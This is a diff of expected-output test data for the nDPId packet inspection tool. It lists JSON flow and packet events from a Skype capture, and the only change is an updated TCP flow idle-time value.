00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1431969683498,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969683498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1nZ0AAEARXdnAqAEib91NmjLdnFEAIcopnHYCxd71ZoU+BTO6L2LN9kiyomjWgPGl4A=="} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"skype.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969683498,"flow_last_seen":1431969683498,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969683498,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.154","src_port":13021,"dst_port":40017,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":1431969683623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969683623,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhCdN4KqwKgBIpxSw5bt8UdnbDRVqqASOJAWbAAAAgQFrAQCCApOqggfPiMrQAEDAwk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":3,"flow_last_seen":1431969683623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969683623,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0bWZAAEAG67HAqAEinTeCqsOWnFJsNFWq7fFHaIAQECxtGQAAAQEICj4jK71Oqggf"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1054,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":1431969683623,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969683623,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhCdN4KqwKgBIpxSw5bt8UdnbDRVqqASOJAWbAAAAgQFrAQCCApOqggfPiMrQAEDAwk="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1055,"source":"skype.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":3,"flow_last_seen":1431969683623,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969683623,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0bWZAAEAG67HAqAEinTeCqsOWnFJsNFWq7fFHaIAQECxtGQAAAQEICj4jK71Oqggf"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1069,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1069,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1431969684467,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969684467,"pkt":"0NQSxnP1PBXCt3IOCABFAAA16v8AAEARrgrAqAEinTeCrDLdnFMAIRT0nHgCu2bzH4JB7obGwPAa3nMCpmcjtPyNNg=="} 00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1069,"source":"skype.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.172","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -628,10 +628,10 @@ 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1070,"source":"skype.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969684467,"flow_last_seen":1431969684467,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431969684467,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.40","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1072,"source":"skype.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":2,"flow_last_seen":1431969684539,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969684539,"pkt":"0NQSxnP1PBXCt3IOCABFAABLqeAAAEARTU7AqAEiwKgBAdRHADUAN3UY\/nwBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAABAAE="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1073,"source":"skype.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":2,"flow_last_seen":1431969684539,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969684539,"pkt":"0NQSxnP1PBXCt3IOCABFAABLQlQAAEARtNrAqAEiwKgBAeQAADUAN6zvm+wBAAABAAAAAAAAAzMzNQEwATcBNwEzBXJzdDEzAXIFc2t5cGUDbmV0AAAcAAE="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685111,"flow_last_seen":1431969685111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969685111,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1431969685111,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969685111,"pkt":"0NQSxnP1PBXCt3IOCABFAABAAC9AAEAGWN3AqAEinTeCqsOYAbvnclCjAAAAALAC\/\/\/oPwAAAgQFtAEDAwUBAQgKPiMxhAAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1084,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":2,"flow_last_seen":1431969685234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969685234,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhCdN4KqwKgBIgG7w5jP+27153JQpKASOJApWgAAAgQFrAQCCApOqgmyPiMxhAEDAwk="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1085,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":3,"flow_last_seen":1431969685234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969685234,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0w75AAEAGlVnAqAEinTeCqsOYAbvnclCkz\/tu9oAQECyACwAAAQEICj4jMf1Oqgmy"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1080,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685111,"flow_last_seen":1431969685111,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969685111,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":50072,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1080,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1431969685111,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969685111,"pkt":"0NQSxnP1PBXCt3IOCABFAABAAC9AAEAGWN3AqAEinTeCqsOYAbvnclCjAAAAALAC\/\/\/oPwAAAgQFtAEDAwUBAQgKPiMxhAAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1084,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":2,"flow_last_seen":1431969685234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969685234,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYhCdN4KqwKgBIgG7w5jP+27153JQpKASOJApWgAAAgQFrAQCCApOqgmyPiMxhAEDAwk="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1085,"source":"skype.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":3,"flow_last_seen":1431969685234,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969685234,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0w75AAEAGlVnAqAEinTeCqsOYAbvnclCkz\/tu9oAQECyACwAAAQEICj4jMf1Oqgmy"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1093,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1431969685483,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1431969685483,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9kPYAAEARbgbAqAEib91KDDLdnF8AKfx\/nHwCoMStpaQYl8DnkwYEqqAF9FXdbHxKRUYHrOVyJRT4"} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1093,"source":"skype.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969685483,"flow_last_seen":1431969685483,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431969685483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -668,12 +668,12 @@ 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1157,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1157,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1431969688514,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969688514,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4ZaYAAEARmVXAqAEib91KEjLdgQkAJLX6nI4C1Tkw7dXubJLsc4XN4Hhz+Cr0PORpW0nsUg=="} 00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1157,"source":"skype.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969688514,"flow_last_seen":1431969688514,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969688514,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1169,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50074,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1169,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAABAzR5AAEAGi+rAqAEinTeCrcOanEPZ9P\/0AAAAALAC\/\/+a6AAAAgQFtAEDAwUBAQgKPiNCegAAAAAEAgAA"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1170,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1170,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGpxAAEAG1PvAqAEi1cezjsObnEM6Aj3FAAAAALAC\/\/+TmAAAAgQFtAEDAwUBAQgKPiNCegAAAAAEAgAA"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1171,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50076,"dst_port":40014,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAABA7khAAEAGAdHAqAEinTfrnMOcnE7UANcqAAAAALAC\/\/9gqgAAAgQFtAEDAwUBAQgKPiNCegAAAAAEAgAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1169,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50074,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1169,"source":"skype.pcap","alias":"nDPId-test","flow_id":194,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAABAzR5AAEAGi+rAqAEinTeCrcOanEPZ9P\/0AAAAALAC\/\/+a6AAAAgQFtAEDAwUBAQgKPiNCegAAAAAEAgAA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1170,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.142","src_port":50075,"dst_port":40003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1170,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGpxAAEAG1PvAqAEi1cezjsObnEM6Aj3FAAAAALAC\/\/+TmAAAAgQFtAEDAwUBAQgKPiNCegAAAAAEAgAA"} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1171,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":50076,"dst_port":40014,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAABA7khAAEAGAdHAqAEinTfrnMOcnE7UANcqAAAAALAC\/\/9gqgAAAgQFtAEDAwUBAQgKPiNCegAAAAAEAgAA"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1172,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1172,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6zvgAAEARklXAqAEiQAQXlzLdnF0AJqz9nJAC1zV5OvO9upQBsUXmJpF2nBcsF0HuRy8JJIUg"} 00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"skype.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.151","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -683,34 +683,34 @@ 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1174,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1174,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1431969689470,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969689470,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyo54AAEARi\/LAqAEi1cezmDLdnFcAHjAjnJQCZ2daOJDdnSgXIMa0IqUKO\/m6pw=="} 00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1174,"source":"skype.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969689470,"flow_last_seen":1431969689470,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969689470,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.152","src_port":13021,"dst_port":40023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1175,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":2,"flow_last_seen":1431969689525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969689525,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcG+JvVx7OOwKgBIpxDw5sesq08OgI9xqASOJCQMAAAAgQFrAQCCApQDL\/UPiNCegEDAwk="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1176,"source":"skype.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":3,"flow_last_seen":1431969689525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969689525,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0n95AAEAGT8XAqAEi1cezjsObnEM6Aj3GHrKtPYAQECznJAAAAQEICj4jQrBQDL\/U"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1178,"source":"skype.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":2,"flow_last_seen":1431969689543,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969689543,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+h2dN+ucwKgBIpxOw5wzprYh1ADXK6ASOJDpcAAAAgQFrAQCCApMWRmAPiNCegEDAwk="} 